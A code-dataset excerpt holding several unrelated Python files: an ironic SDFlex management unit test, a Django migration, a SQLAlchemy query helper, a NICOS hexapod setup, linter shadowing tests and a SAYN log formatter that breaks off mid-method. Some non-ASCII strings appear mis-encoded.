content stringlengths 5 1.05M |
|---|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
# Copyright 2020-2021 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for Management Interface used by Sdflex modules."""
import mock
from ironic.common import states
from ironic.conductor import task_manager
from ironic.drivers.modules import agent_base
from ironic.drivers import utils as driver_utils
from sdflex_ironic_driver.sdflex_redfish import management as sdflex_management
from sdflex_ironic_driver.tests.unit.sdflex_redfish import test_common \
as sdflex_common
class SDFlexManagementTestCase(sdflex_common.BaseSdflexTest):
    """Tests for the SDFlex management interface firmware (SUM) steps.

    Covers both the clean-step variant (``update_firmware_sum``) and the
    deploy-step variant (``flash_firmware_sum``), plus the ``_update_
    firmware_sum_final`` completion callback that persists ramdisk logs.
    """

    def setUp(self):
        super(SDFlexManagementTestCase, self).setUp()

    @mock.patch.object(agent_base, 'execute_step', autospec=True)
    def _test_do_update_firmware_sum(self, execute_mock, step_type='clean'):
        # Shared helper: verifies that the firmware-update step delegates
        # to agent_base.execute_step with the node's current step dict and
        # returns the expected *WAIT state for the given step type.
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            execute_mock.return_value = states.CLEANWAIT
            # | GIVEN |
            firmware_update_args = {
                'url': 'http://any_url',
                'checksum': 'xxxx'}
            step = {'interface': 'management',
                    'args': firmware_update_args}
            if step_type == 'clean':
                step['step'] = 'update_firmware_sum'
                task.node.provision_state = states.CLEANING
                execute_mock.return_value = states.CLEANWAIT
                task.node.clean_step = step
                func = task.driver.management.update_firmware_sum
                exp_ret_state = states.CLEANWAIT
            else:
                step['step'] = 'flash_firmware_sum'
                task.node.provision_state = states.DEPLOYING
                execute_mock.return_value = states.DEPLOYWAIT
                task.node.deploy_step = step
                func = task.driver.management.flash_firmware_sum
                exp_ret_state = states.DEPLOYWAIT
            # | WHEN |
            return_value = func(task, **firmware_update_args)
            # | THEN |
            self.assertEqual(exp_ret_state, return_value)
            execute_mock.assert_called_once_with(task, step, step_type)

    def test_update_firmware_sum(self):
        self._test_do_update_firmware_sum(step_type='clean')

    def test_flash_firmware_sum(self):
        self._test_do_update_firmware_sum(step_type='deploy')

    @mock.patch.object(driver_utils, 'store_ramdisk_logs')
    def _test__update_firmware_sum_final_with_logs(self, store_mock,
                                                   step_type='clean'):
        # With deploy_logs_collect='always', the SUM 'Log Data' returned
        # by the agent must be persisted via store_ramdisk_logs with the
        # step name as the label.
        self.config(deploy_logs_collect='always', group='agent')
        firmware_update_args = {
            'url': 'any_valid_url',
            'checksum': 'xxxx'}
        step = {'interface': 'management',
                'args': firmware_update_args}
        if step_type == 'clean':
            step['step'] = 'update_firmware_sum'
            node_state = states.CLEANWAIT
            command = {
                'command_status': 'SUCCEEDED',
                'command_result': {
                    'clean_result': {'Log Data': 'aaaabbbbcccdddd'},
                    'clean_step': step,
                }
            }
            exp_label = 'update_firmware_sum'
        else:
            step['step'] = 'flash_firmware_sum'
            node_state = states.DEPLOYWAIT
            command = {
                'command_status': 'SUCCEEDED',
                'command_result': {
                    'deploy_result': {'Log Data': 'aaaabbbbcccdddd'},
                    'deploy_step': step,
                }
            }
            exp_label = 'flash_firmware_sum'
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            task.node.provision_state = node_state
            task.driver.management._update_firmware_sum_final(
                task, command)
            store_mock.assert_called_once_with(task.node, 'aaaabbbbcccdddd',
                                               label=exp_label)

    def test__update_firmware_sum_final_with_logs_clean(self):
        self._test__update_firmware_sum_final_with_logs(step_type='clean')

    def test__write_firmware_sum_final_with_logs_deploy(self):
        self._test__update_firmware_sum_final_with_logs(step_type='deploy')

    @mock.patch.object(driver_utils, 'store_ramdisk_logs')
    def _test__update_firmware_sum_final_without_logs(self, store_mock,
                                                      step_type='clean'):
        # With deploy_logs_collect='on_failure', a SUCCEEDED command must
        # NOT trigger log collection.
        self.config(deploy_logs_collect='on_failure', group='agent')
        firmware_update_args = {
            'url': 'any_valid_url',
            'checksum': 'xxxx'}
        step = {'interface': 'management',
                'args': firmware_update_args}
        if step_type == 'clean':
            step['step'] = 'update_firmware_sum'
            command = {
                'command_status': 'SUCCEEDED',
                'command_result': {
                    'clean_result': {'Log Data': 'aaaabbbbcccdddd'},
                    'clean_step': step,
                }
            }
        else:
            step['step'] = 'flash_firmware_sum'
            command = {
                'command_status': 'SUCCEEDED',
                'command_result': {
                    'deploy_result': {'Log Data': 'aaaabbbbcccdddd'},
                    'deploy_step': step,
                }
            }
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            task.driver.management._update_firmware_sum_final(
                task, command)
            self.assertFalse(store_mock.called)

    def test__update_firmware_sum_final_without_logs_clean(self):
        self._test__update_firmware_sum_final_without_logs(step_type='clean')

    def test__update_firmware_sum_final_without_logs_deploy(self):
        self._test__update_firmware_sum_final_without_logs(step_type='deploy')

    @mock.patch.object(sdflex_management, 'LOG', spec_set=True, autospec=True)
    @mock.patch.object(driver_utils, 'store_ramdisk_logs')
    def _test__update_firmware_sum_final_environment_error(self, store_mock,
                                                           log_mock,
                                                           step_type='clean'):
        # An EnvironmentError while storing logs must be swallowed and
        # reported through LOG.exception (it must not fail the step).
        self.config(deploy_logs_collect='always', group='agent')
        firmware_update_args = {
            'url': 'any_valid_url',
            'checksum': 'xxxx'}
        step = {'interface': 'management',
                'args': firmware_update_args}
        if step_type == 'clean':
            step['step'] = 'update_firmware_sum'
            node_state = states.CLEANWAIT
            command = {
                'command_status': 'SUCCEEDED',
                'command_result': {
                    'clean_result': {'Log Data': 'aaaabbbbcccdddd'},
                    'clean_step': step,
                }
            }
        else:
            step['step'] = 'flash_firmware_sum'
            node_state = states.DEPLOYWAIT
            command = {
                'command_status': 'SUCCEEDED',
                'command_result': {
                    'deploy_result': {'Log Data': 'aaaabbbbcccdddd'},
                    'deploy_step': step,
                }
            }
        store_mock.side_effect = EnvironmentError('Error')
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            task.node.provision_state = node_state
            task.driver.management._update_firmware_sum_final(
                task, command)
            self.assertTrue(log_mock.exception.called)

    def test__update_firmware_sum_final_environment_error_clean(self):
        self._test__update_firmware_sum_final_environment_error(
            step_type='clean')

    def test__update_firmware_sum_final_environment_error_deploy(self):
        self._test__update_firmware_sum_final_environment_error(
            step_type='deploy')

    @mock.patch.object(sdflex_management, 'LOG', spec_set=True, autospec=True)
    @mock.patch.object(driver_utils, 'store_ramdisk_logs')
    def _test__update_firmware_sum_final_unknown_exception(self, store_mock,
                                                           log_mock,
                                                           step_type='clean'):
        # Any other exception while storing logs is likewise swallowed
        # and logged via LOG.exception.
        self.config(deploy_logs_collect='always', group='agent')
        firmware_update_args = {
            'url': 'any_valid_url',
            'checksum': 'xxxx'}
        step = {'interface': 'management',
                'args': firmware_update_args}
        if step_type == 'clean':
            step['step'] = 'update_firmware_sum'
            node_state = states.CLEANWAIT
            command = {
                'command_status': 'SUCCEEDED',
                'command_result': {
                    'clean_result': {'Log Data': 'aaaabbbbcccdddd'},
                    'clean_step': step,
                }
            }
        else:
            step['step'] = 'flash_firmware_sum'
            node_state = states.DEPLOYWAIT
            command = {
                'command_status': 'SUCCEEDED',
                'command_result': {
                    'deploy_result': {'Log Data': 'aaaabbbbcccdddd'},
                    'deploy_step': step,
                }
            }
        store_mock.side_effect = Exception('Error')
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            task.node.provision_state = node_state
            task.driver.management._update_firmware_sum_final(
                task, command)
            self.assertTrue(log_mock.exception.called)

    def test__update_firmware_sum_final_unknown_exception_clean(self):
        self._test__update_firmware_sum_final_unknown_exception(
            step_type='clean')

    def test__update_firmware_sum_final_unknown_exception_deploy(self):
        self._test__update_firmware_sum_final_unknown_exception(
            step_type='deploy')
|
# Generated by Django 3.1 on 2020-09-23 05:14
from django.db import migrations, models
import django.db.models.deletion
import draftjs_sanitizer
import saleor.core.db.fields
class Migration(migrations.Migration):
    """Initial migration: creates the ``Crawler`` model.

    Depends on the ``ushop`` app's initial migration because of the
    ``shop`` foreign key below.
    """

    initial = True

    dependencies = [
        ('ushop', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Crawler',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('publication_date', models.DateField(blank=True, null=True)),
                ('is_published', models.BooleanField(default=False)),
                # Crawl source URL; unique so every URL has at most one crawler row.
                ('url', models.URLField(unique=True)),
                ('completed', models.BooleanField(default=False)),
                # auto_now: updated on every save, i.e. time of last crawl.
                ('crawled_at', models.DateTimeField(auto_now=True, null=True)),
                ('product_count', models.PositiveSmallIntegerField(blank=True, null=True)),
                # Sanitized draft-js JSON payload plus a backup copy of it.
                ('json_data', saleor.core.db.fields.SanitizedJSONField(blank=True, default=dict, sanitizer=draftjs_sanitizer.clean_draft_js)),
                ('json_data_backup', saleor.core.db.fields.SanitizedJSONField(blank=True, default=dict, sanitizer=draftjs_sanitizer.clean_draft_js)),
                # CSS/XPath selectors used by the crawler for list and product pages.
                ('listSelection', models.TextField(blank=True)),
                ('productSelection', models.TextField(blank=True)),
                ('shop', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='crawlers', to='ushop.shop')),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
|
import os
APP_NAME = os.path.basename(os.path.dirname(__file__))
__version_info__ = (1, 0, 0)
__version__ = ".".join(map(str, __version_info__))
default_app_config = 'csv_manager.apps.CsvManagerConfig' |
from db import session_scope
class DataBaseAccess:
    """Small helper around SQLAlchemy session queries.

    ``data_select`` builds a SELECT with optional joins and filters; the
    insert/update/delete hooks are placeholders.
    """

    def data_select(self, models, inner_join_list=None, outer_join_list=None,
                    filter_list=None):
        """Build and return a query over *models*.

        :param models: model classes / columns passed to ``session.query``.
        :param inner_join_list: list of argument tuples for ``Query.join``.
        :param outer_join_list: list of argument tuples for ``Query.outerjoin``.
        :param filter_list: list of ``(model, column_name, operator, value)``
            rows applied via ``__filter`` (AND semantics).
        """
        # NOTE: defaults were mutable lists ([]); use None to avoid the
        # shared-mutable-default pitfall while keeping the interface.
        self.filter_list = filter_list
        with session_scope() as session:
            # Build the base SELECT from the requested models.
            self.query = session.query(*models)
            # Query objects are immutable: join()/outerjoin() return a NEW
            # query, so the result must be reassigned.  The original code
            # discarded the return value, silently dropping every join.
            for join in (inner_join_list or []):
                self.query = self.query.join(*join)
            for join in (outer_join_list or []):
                self.query = self.query.outerjoin(*join)
            # Apply filters when requested.
            if self.filter_list is not None:
                self.__filter()
            return self.query

    def data_insert(self):
        # Placeholder: not implemented yet.
        pass

    def data_update(self):
        # Placeholder: not implemented yet.
        pass

    def data_delete(self):
        # Placeholder: not implemented yet.
        pass

    def __filter(self):
        # Each filter row is (model, column name, operator, target value).
        for raw in self.filter_list:
            try:
                model, key, op, value = raw
            except ValueError:
                raise Exception('ํํฐ ํ์ ๋๋ ๋ฐ์ดํฐ๊ฐ ๋ง์ง ์์ต๋๋ค : %s' % raw)
            # Resolve the column attribute on the model class.
            column = getattr(model, key, None)
            if not column:
                raise Exception("๋ชจ๋ธ์ %s ํ๋๊ฐ ์์ต๋๋ค." % key)
            if op == 'in':
                # IN filters are built from the COLUMN, not the query.
                # (The original called self.query.in_, which does not
                # exist on Query and raised AttributeError.)
                if isinstance(value, list):
                    filt = column.in_(value)
                else:
                    filt = column.in_(value.split(','))
            else:
                try:
                    # Comparator methods may be named 'op', 'op_' or
                    # '__op__' depending on the operator (e.g. 'like',
                    # 'ilike', '__eq__'); pick whichever exists.
                    attr = list(filter(lambda e: hasattr(column, e % op),
                                       ['%s', '%s_', '__%s__']))[0] % op
                except IndexError:
                    raise Exception('ํด๋น ์ปฌ๋ผ์๋ {} ์๋ ๋น๊ต์ฐ์ฐ ์๋๋ค : {}'.format(column, op))
                # The literal string 'null' means SQL NULL.
                if value == 'null':
                    value = None
                # Build the condition from the resolved comparator.
                filt = getattr(column, attr)(value)
            # AND the condition onto the query.
            self.query = self.query.filter(filt)
|
# -*- coding: utf-8 -*-

# NICOS setup file: the six axes of the collimation hexapod at BIODIFF
# (three translations in mm, three rotations in deg), each mapped to a
# Tango motor device.

description = 'Collimation hexapod setup'
group = 'lowlevel'

# Base address of the hexapod Tango server; individual axes live below it.
tango_base = 'tango://phys.biodiff.frm2:10000/biodiff/hexapod/'

devices = dict(
    # --- translation axes (mm) ---
    collimator_x = device('nicos.devices.entangle.Motor',
        description = 'collimator hexapod X axis',
        tangodevice = tango_base + 'x',
        unit = 'mm',
        precision = 0.01,
    ),
    collimator_y = device('nicos.devices.entangle.Motor',
        description = 'collimator hexapod Y axis',
        tangodevice = tango_base + 'y',
        unit = 'mm',
        precision = 0.01,
    ),
    collimator_z = device('nicos.devices.entangle.Motor',
        description = 'collimator hexapod Z axis',
        tangodevice = tango_base + 'z',
        unit = 'mm',
        precision = 0.01,
    ),
    # --- rotation axes (deg); the Tango server names them u/v/w ---
    collimator_arc_x = device('nicos.devices.entangle.Motor',
        description = 'collimator hexapod rotation around X axis',
        tangodevice = tango_base + 'u',
        unit = 'deg',
        precision = 0.01,
    ),
    collimator_arc_y = device('nicos.devices.entangle.Motor',
        description = 'collimator hexapod rotation around Y axis',
        tangodevice = tango_base + 'v',
        unit = 'deg',
        precision = 0.01,
    ),
    collimator_arc_z = device('nicos.devices.entangle.Motor',
        description = 'collimator hexapod rotation around Z axis',
        tangodevice = tango_base + 'w',
        unit = 'deg',
        precision = 0.01,
    ),
)
|
import pytest
from hamcrest import assert_that, contains_inanyorder
from tests.testing_utils import param_wrapper, run_flake8, run_pylint
params = [
# code, flake8 rules, pylint rules
param_wrapper('max = 4', {'A001'}, {'W0622'}, id='top_level'),
param_wrapper((
'def bla():',
' filter = 4',
), {'A001'}, {'W0622'}, id='variable_inside_function'),
param_wrapper((
'class Bla:',
' def method(self):',
' int = 4',
), {'A001'}, {'W0622'}, id='var_inside_method'),
param_wrapper('bla, *int = range(4)', {'A001'}, {'W0622'}, id='starred_assignment'),
param_wrapper('[bla, int] = range(2)', {'A001'}, {'W0622'}, id='list_assignment'),
param_wrapper((
'for format in (1, 2, 3):',
' continue',
), {'A001', 'B007', 'WPS327', 'WPS328'}, {'W0622'}, id='for_loop'),
param_wrapper((
'for index, format in enumerate([1, 2, 3]):',
' continue',
), {'A001', 'B007', 'WPS327', 'WPS328'}, {'W0622'}, id='for_loop_multiple_variables'),
param_wrapper((
'for [index, format] in enumerate([1, 2, 3]):',
' continue',
), {'A001', 'B007', 'WPS327', 'WPS328', 'WPS405'}, {'W0622'}, id='for_loop_multiple_variables_list'),
param_wrapper((
"for index, (format, list) in enumerate([(1, 'a'), (2, 'b')]):",
' continue',
), {'A001', 'B007', 'WPS221', 'WPS327', 'WPS328', 'WPS405', 'WPS414'}, {'W0622'}, id='for_loop_nested'),
param_wrapper((
"for index, *int in enumerate([(1, 'a'), (2, 'b')]):",
' continue',
), {'A001', 'B007', 'WPS327', 'WPS328'}, {'W0622'}, id='for_loop_starred'),
param_wrapper((
"with open('bla.txt') as dir:",
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'W0622'}, id='with_statement'),
param_wrapper((
"with open('bla.txt') as dir, open('bla.txt') as int:",
' pass',
), {'A001', 'WPS316', 'WPS328', 'WPS420'}, {'W0622'}, id='with_statement_multiple'),
param_wrapper((
"with open('bla.txt') as (dir, bla):",
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'W0622'}, id='with_statement_unpack'),
param_wrapper((
"with open('bla.txt') as [dir, bla]:",
' pass',
), {'A001', 'WPS328', 'WPS406', 'WPS420'}, {'W0622'}, id='with_statement_unpack_list'),
param_wrapper((
"with open('bla.txt') as (bla, *int):",
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'W0622'}, id='with_statement_unpack_star'),
param_wrapper(
'import datetime as int',
{'A001', 'F401'}, {'W0611', 'W0622'}, id='import_as',
),
param_wrapper(
'from datetime import datetime as int',
{'A001', 'F401'}, {'W0611', 'W0622'}, id='import_from_as',
),
param_wrapper((
'class int:',
' pass',
), {'A001', 'N801', 'WPS420', 'WPS604'}, {'W0622'}, id='class_name'),
param_wrapper((
'def int():',
' return 1',
), {'A001'}, {'W0622'}, id='function_name'),
param_wrapper((
'async def int():',
' pass',
), {'A001', 'WPS420'}, {'W0622'}, id='async_function_name'),
param_wrapper((
'async def bla():',
' async for int in range(4):',
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'E1133', 'W0622'}, id='async for'),
param_wrapper((
'async def bla():',
" async with open('bla.txt') as int:",
' pass',
), {'A001', 'WPS328', 'WPS420'}, {'W0622'}, id='async with'),
param_wrapper('[int for int in range(3, 9)]', {'A001'}, {'R1721', 'W0106'}, id='list_comprehension'),
param_wrapper(
'[(int, list) for int, list in enumerate(range(3, 9))]',
{'A001', 'WPS200'}, {'R1721', 'W0106'}, id='list_comprehension_multiple',
),
param_wrapper(
'[(int, a) for [int, a] in enumerate(range(3, 9))]',
{'A001', 'WPS200', 'WPS405'}, {'W0106'}, id='list_comprehension_multiple_as_list',
),
param_wrapper((
'try:',
' a = 2',
'except Exception as int:',
' a = 1',
), {'A001'}, {'W0703'}, id='exception'),
param_wrapper((
'def bla(list):',
' a = 4',
), {'A002'}, {'W0613', 'W0622'}, id='function_parameter'),
param_wrapper((
'def bla(dict=3):',
' a = 4',
), {'A002'}, {'W0613', 'W0622'}, id='function_keyword_parameter'),
param_wrapper((
'class Bla:',
' object = 4',
), {'A003'}, set(), id='class_attribute'),
param_wrapper((
'class Bla:',
' def int(self):',
' pass',
), {'A003', 'WPS420'}, set(), id='method_name'),
]
@pytest.mark.parametrize('content,flake8_errors,pylint_errors', params)
def test_detects_variable_shadowing(content, flake8_errors, pylint_errors, file_to_lint):
    """Each snippet must yield exactly the expected flake8/pylint codes."""
    file_to_lint.write_text(content)
    flake8_found = set(run_flake8(file_to_lint))
    assert_that(flake8_found, contains_inanyorder(*flake8_errors))
    pylint_found = set(run_pylint(file_to_lint))
    assert_that(pylint_found, contains_inanyorder(*pylint_errors))
|
from datetime import date, datetime, timedelta
import traceback
from colorama import init, Fore, Style
from ..utils.misc import group_list
init(autoreset=True)
def human(obj):
    """Render *obj* in a short human-friendly form.

    timedeltas become '2h' / '1.5m' / '30s' / '500ms', datetimes become
    'HH:MM', snake_case strings become Title Case, anything else is
    returned unchanged.
    """
    if isinstance(obj, timedelta):
        def trim(number, suffix):
            # Round to one decimal and drop a trailing '.0' (2.0 -> '2').
            text = str(round(number, 1))
            if text.endswith('0'):
                text = text[:-2]
            return f"{text}{suffix}"

        secs = obj.total_seconds()
        mins = secs / 60.0
        hours = mins / 60.0
        if hours > 1.0:
            return trim(hours, "h")
        if mins > 1.0:
            return trim(mins, "m")
        if secs > 1.0:
            return trim(secs, "s")
        return trim(secs * 1000.0, "ms")
    if isinstance(obj, datetime):
        return obj.strftime("%H:%M")
    if isinstance(obj, str):
        return obj.replace("_", " ").title()
    return obj
class LogFormatter:
    """Formats SAYN runner events into levelled console messages.

    Each event-handling method returns ``{'level': ..., 'message': ...}``
    where message is a string or list of strings, optionally decorated
    with colorama colours and unicode icons.

    Bug fix: ``__init__`` previously ignored its ``use_icons`` argument
    and always set ``self.use_icons = True``; it now honours the flag.
    """

    use_colour = True
    use_icons = True
    output_ts = False

    def __init__(self, use_colour=True, use_icons=True, output_ts=False):
        self.use_colour = use_colour
        self.output_ts = output_ts
        # Honour the caller's choice (was hard-coded to True).
        self.use_icons = use_icons

    # Styling methods

    def dim(self, s):
        if self.use_colour:
            return f"{Style.DIM}{s}{Style.NORMAL}"
        else:
            return s

    def bright(self, s):
        if self.use_colour:
            return f"{Style.BRIGHT}{s}{Style.NORMAL}"
        else:
            return s

    def red(self, s):
        if self.use_colour:
            return f"{Fore.RED}{s}{Fore.RESET}"
        else:
            return s

    def bright_red(self, s):
        if self.use_colour:
            return f"{Fore.RED}{Style.BRIGHT}{s}{Style.NORMAL}{Fore.RESET}"
        else:
            return s

    def yellow(self, s):
        if self.use_colour:
            return f"{Fore.YELLOW}{s}{Fore.RESET}"
        else:
            return s

    def bright_yellow(self, s):
        if self.use_colour:
            return f"{Fore.YELLOW}{Style.BRIGHT}{s}{Style.NORMAL}{Fore.RESET}"
        else:
            return s

    def green(self, s):
        if self.use_colour:
            return f"{Fore.GREEN}{s}{Fore.RESET}"
        else:
            return s

    def bright_green(self, s):
        if self.use_colour:
            return f"{Fore.GREEN}{Style.BRIGHT}{s}{Style.NORMAL}{Fore.RESET}"
        else:
            return s

    def indent(self, s, l):
        # NOTE(review): only indents in colour mode — looks intentional
        # (plain output stays flush-left) but worth confirming.
        if self.use_colour:
            return " " * l + s
        else:
            return s

    def good(self, s):
        if self.use_colour and self.use_icons:
            return self.green(f"โ {s}")
        else:
            return s

    def info(self, s):
        if self.use_colour and self.use_icons:
            return f"โน {s}"
        else:
            return s

    def warn(self, s):
        if self.use_colour and self.use_icons:
            return self.yellow(f"โ {s}")
        else:
            return s

    def bad(self, s):
        if self.use_colour and self.use_icons:
            return self.red(f"โ {s}")
        else:
            return s

    def join(self, l, sep, f):
        # In plain mode the styling function f is skipped entirely.
        if self.use_colour:
            return sep.join(f(s) for s in l)
        else:
            return sep.join(l)

    def blist(self, l):
        # Comma-separated list with each item brightened (colour mode).
        if self.use_colour:
            return self.join(l, ", ", self.bright)
        else:
            return ", ".join(l)

    # Event handling methods

    def unhandled(self, event, context, stage, details):
        """Fallback for events with no dedicated handler."""
        ignored = (
            "project_git_commit",
            "sayn_version",
            "project_name",
            "ts",
            "run_id",
            "task",
            "task_order",
            "total_tasks",
        )
        ctx = details["task"] if context == "task" else context
        return {
            "level": "error",
            "message": f"Unhandled: {ctx}::{stage}::{event}: "
            + {k: v for k, v in details.items() if k not in ignored}.__str__(),
        }

    def message(self, level, message, details):
        """Decorate free-form message lines according to their level."""
        if not isinstance(message, list):
            message = [message]
        out = []
        ts = f"[{human(details['ts'])}]" if self.output_ts else ""
        for m in message:
            if level == "error":
                out.append(self.bad(f"{ts} {m}"))
            elif level == "warning":
                out.append(self.warn(f"{ts} {m}"))
            elif level == "debug":
                out.append(self.dim(f"{ts} {m}"))
            else:
                out.append(f"{ts} {m}")
        return {"level": level, "message": out}

    def error_result(self, duration, error):  # noqa: C901
        """Map a sayn Error object to a levelled, formatted message."""
        level = "error"
        message = self.bad(error.__str__())
        duration = human(duration)
        if error.kind == "exception":
            exc = error.details["exception"]
            message = [self.bad(f"Failed ({duration}) {exc}")]
            # NOTE(review): the etype keyword was removed from
            # traceback.format_exception in Python 3.10 — confirm the
            # supported interpreter range before changing.
            message.extend(
                [
                    self.red(l)
                    for it in traceback.format_exception(
                        etype=type(exc), value=exc, tb=exc.__traceback__
                    )
                    for l in it.split("\n")
                ]
            )
        elif error.kind == "dag" and error.code == "cycle_error":
            level = "error"
            message = self.bad(
                f"A cycle was detected in the dag: {' > '.join(error.details['path'])}"
            )
        elif error.kind == "dag" and error.code == "missing_parents":
            level = "error"
            message = ["Some parents are missing from dag"] + [
                self.red(f"In task {self.bright(task)}: {', '.join(parents)}")
                for task, parents in error.details["missing"].items()
            ]
        elif error.code == "wrong_credentials":
            level = "error"
            message = self.bad(
                f'Connections {self.bright(", ".join(error.details["credentials"]))} not defined in project.yaml'
            )
        elif error.code == "missing_credentials":
            level = "error"
            message = self.bad(
                f'Connections {self.bright(", ".join(error.details["credentials"]))} are required by project.yaml'
            )
        elif error.code == "missing_credential_type":
            level = "error"
            message = self.bad(
                f'Connections {self.bright(", ".join(error.details["credentials"]))} have no type'
            )
        elif error.kind == "tasks" and error.code == "task_fail":
            level = "error"
            message = self.bad(error.details["message"])
        elif error.code == "parent_errors":
            # Task skipped because an ancestor failed: warning, not error.
            level = "warning"
            parents = ", ".join(
                [f"{p} ({s.value})" for p, s in error.details["failed_parents"].items()]
            )
            message = self.warn(
                f"Skipping due to ancestors errors: {parents} ({duration})"
            )
        elif error.code == "setup_error":
            if error.details["status"].value == "skipped":
                level = "warning"
                message = self.warn(f"Skipping due to parent errors ({duration})")
            else:
                level = "error"
                message = self.bad(f"Failed during setup ({duration})")
        elif error.code == "validation_error":
            level = "error"
            message = [self.bad(f"Validation errors found ({duration})")]
            message.extend(
                [
                    self.red(f"  In {' > '.join(e['loc'])}: {e['msg']}")
                    for e in error.details["errors"]
                ]
            )
        elif error.code == "sql_execution_error" and "message" in error.details:
            level = "error"
            message = self.bad(error.details["message"])
        elif error.kind == "database" and error.code == "operational_error":
            level = "error"
            message = self.bad(error.details["message"])
        elif error.kind == "parsing" and "filename" in error.details:
            level = "error"
            if "error" in error.details:
                message = self.bad(
                    f"""Parsing error in file: {error.details['filename']}
Details: {error.details['error']}
Line: {error.details['line']}"""
                )
            else:
                message = self.bad(f"File not found: {error.details['filename']}")
        elif error.kind == "task_type" and error.code == "invalid_task_type_error":
            level = "error"
            group = error.details["group"]
            task_type = error.details["type"]
            message = self.bad(
                f"""Task error in task group: {group}. Invalid task type: {task_type}.
Current Valid Task Types:
- autosql
- sql
- python
- copy
- dummy
For more details please check SAYN documentation: https://173tech.github.io/sayn/tasks/overview/
"""
            )
        elif (
            error.kind == "python_loader"
            and error.code == "load_class_exception"
            and "exception" in error.details
        ):
            level = "error"
            message = self.bad(str(error.details["exception"]))
        elif (
            error.kind == "python_loader"
            and error.code == "missing_class"
            and "pyclass" in error.details
        ):
            level = "error"
            path = error.details["module_path"]
            if len(path) > 0:
                message = self.bad(
                    f"Error in file: {error.details['module_path']}.py. Missing Class: {error.details['pyclass']}."
                )
            else:
                message = self.bad(f"Invalid path: {error.details['pyclass']}")
        return {
            "level": level,
            "message": message,
        }

    # App context

    def app_start(self, details):
        """Banner printed when the sayn app starts."""
        debug = "(debug)" if details["run_arguments"]["debug"] else ""
        yesterday = date.today() - timedelta(days=1)
        if details["run_arguments"]["full_load"]:
            dt_range = "Full Load"
        elif (
            details["run_arguments"]["start_dt"] == details["run_arguments"]["end_dt"]
            and details["run_arguments"]["end_dt"] == yesterday
        ):
            # start == end == yesterday is the implicit default window.
            dt_range = "Default"
        elif details["run_arguments"]["start_dt"] == details["run_arguments"]["end_dt"]:
            dt_range = f"{details['run_arguments']['start_dt']}"
        else:
            dt_range = f"{details['run_arguments']['start_dt']} to {details['run_arguments']['end_dt']}"
        out = list()
        out.append(f"Starting sayn {debug}")
        out.append(f"Run ID: {details['run_id']}")
        out.append(f"Project: {details['project_name']}")
        out.append(f"Sayn version: {details['sayn_version']}")
        if details["project_git_commit"] is not None:
            out.append(f"Git commit: {details['project_git_commit']}")
        out.append(f"Period: {dt_range}")
        out.append(
            f"{'Profile: ' + (details['run_arguments'].get('profile') or 'Default')}"
        )
        return {"level": "info", "message": out}

    def app_finish(self, details):
        """Summary line for the whole run."""
        if "error" in details:
            return self.error_result(details["duration"], details["error"].error)
        else:
            errors = details["tasks"].get("failed", list()) + details["tasks"].get(
                "skipped", list()
            )
            msg = f"Execution of SAYN took {human(details['duration'])}"
            if len(errors) > 0:
                return {"level": "error", "message": self.bad(msg)}
            else:
                return {"level": "info", "message": self.good(msg)}

    def app_stage_start(self, stage, details):
        if stage == "setup":
            return {"level": "info", "message": "Setting up..."}
        elif stage in ("run", "compile"):
            return {
                "level": "info",
                "message": self.bright(
                    f"Starting {stage} at {details['ts'].strftime('%H:%M')}..."
                ),
            }
        else:
            return self.unhandled("start_stage", "app", stage, details)

    def app_stage_finish(self, stage, details):
        """Per-stage summary: tallies succeeded / failed / skipped tasks."""
        tasks = group_list([(v.value, t) for t, v in details["tasks"].items()])
        failed = tasks.get("failed", list())
        succeeded = tasks.get("ready", list()) + tasks.get("succeeded", list())
        skipped = tasks.get("skipped", list())
        duration = human(details["duration"])
        totals_msg = (
            f"Total tasks: {len(succeeded+failed+skipped)}. "
            f"Success: {len(succeeded)}. Failed {len(failed)}. Skipped {len(skipped)}."
        )
        if stage == "setup":
            out = ["Finished setup:"]
            level = "info"
            if len(failed) > 0:
                out.append(self.bad(f"Tasks failed: {self.blist(failed)}"))
                level = "error"
            if len(skipped) > 0:
                out.append(self.warn(f"Tasks to skip: {self.blist(skipped)}"))
                level = "error"
            if len(succeeded) > 0:
                out.append(self.good(f"Tasks to run: {self.blist(succeeded)}"))
            return {"level": level, "message": out}
        elif stage in ("run", "compile"):
            if len(failed) > 0 or len(skipped) > 0:
                out = [
                    self.red(
                        f"There were some errors during {stage} (took {duration})"
                    ),
                    self.red(totals_msg),
                ]
                if len(failed) > 0:
                    out.append(self.bad(f"Failed: {self.blist(failed)}"))
                if len(skipped) > 0:
                    out.append(self.warn(f"Skipped: {self.blist(skipped)}"))
                return {"level": "error", "message": out}
            else:
                return {
                    "level": "info",
                    "message": [
                        self.good(totals_msg),
                        self.good(
                            f"{stage.capitalize()} finished successfully in {duration}"
                        ),
                        f"Tasks executed: {self.blist(succeeded)}",
                    ],
                }
        else:
            return self.unhandled("finish_stage", "app", stage, details)

    # Task context

    def task_set_steps(self, details):
        return {
            "level": "info",
            "message": f"Run Steps: {self.blist(details['steps'])}",
        }

    def task_stage_start(self, stage, task, task_order, total_tasks, details):
        task_progress = f"[{task_order}/{total_tasks}]"
        ts = human(details["ts"])
        if stage == "setup":
            return {"level": "info", "message": f"{task_progress} {self.bright(task)}"}
        elif stage in ("run", "compile"):
            return {
                "level": "info",
